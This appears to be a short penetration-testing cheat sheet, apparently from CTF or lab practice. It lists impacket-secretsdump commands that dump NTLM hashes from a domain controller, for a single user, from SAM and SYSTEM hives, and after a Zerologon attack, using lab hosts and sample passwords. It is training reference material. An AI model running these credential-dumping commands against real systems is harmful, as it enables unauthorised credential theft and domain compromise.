impacket-secretsdump - Domain NTLM Dump
Just NTLM hashes from DC
impacket-secretsdump -just-dc-ntlm vulnnet-rst.local/a-whitehat@10.10.176.223
Single user
impacket-secretsdump -just-dc-user dave corp.com/jeffadmin:"BrouhahaTungPerorateBroom2023\!"@192.168.50.70
Local SAM offline
impacket-secretsdump -sam ./SAM -system ./SYSTEM LOCAL
Local SAM live (with valid creds)
secretsdump.py thecyborg.lab/user1:'Password@123'@192.168.192.142
After Zerologon (no password)
impacket-secretsdump -just-dc-ntlm -no-pass 'svcorp/SV-DC01$@10.11.1.20'